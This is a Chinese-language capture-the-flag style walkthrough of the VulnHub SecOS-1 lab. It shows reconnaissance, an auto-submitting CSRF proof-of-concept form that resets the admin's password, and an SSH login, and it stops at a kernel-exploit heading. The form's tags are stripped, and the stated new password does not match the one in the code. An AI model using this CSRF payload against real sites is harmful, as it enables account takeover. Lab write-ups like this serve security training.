下载地址

https://download.vulnhub.com/secos/SecOS-1.tar.gz

不要用vmbox启动，用vmware添加硬盘的方式启动，不然会找不到IP

实战演练

使用netdiscover命令查找靶机的IP。

使用nmap查看靶机开放的端口

打开浏览器

使用bp找到了一个页面

查看页面源代码

第一：用户管理员会频繁看网站

第二：他运行在本地接口

第三：存在CSRF漏洞

创建一个账号

登录进去，可以看到管理员是spiderman

使用bp生成修改密码的csrf的poc

html>
body>
form name="changepass" method="post" action="http://127.0.0.1:8081/change-password">
input type="hidden" name="username" value="spiderman">
input type="hidden" name="password" value="abc123">
/form>
script type="text/javascript">
document.changepass.submit();
/script>
/body>
/html>

发送消息给管理员

几分钟后，apache访问日志显示有人查看了我们的页面。

所以希望蜘蛛侠的密码重置为蜘蛛侠。是时候登录蜘蛛侠帐户了。

登录成功，我们看到信息里面有个人说获取到我们的密码，试一下用这个密码登录ssh

登录ssh成功

sudo不行

查看内核版本

EXP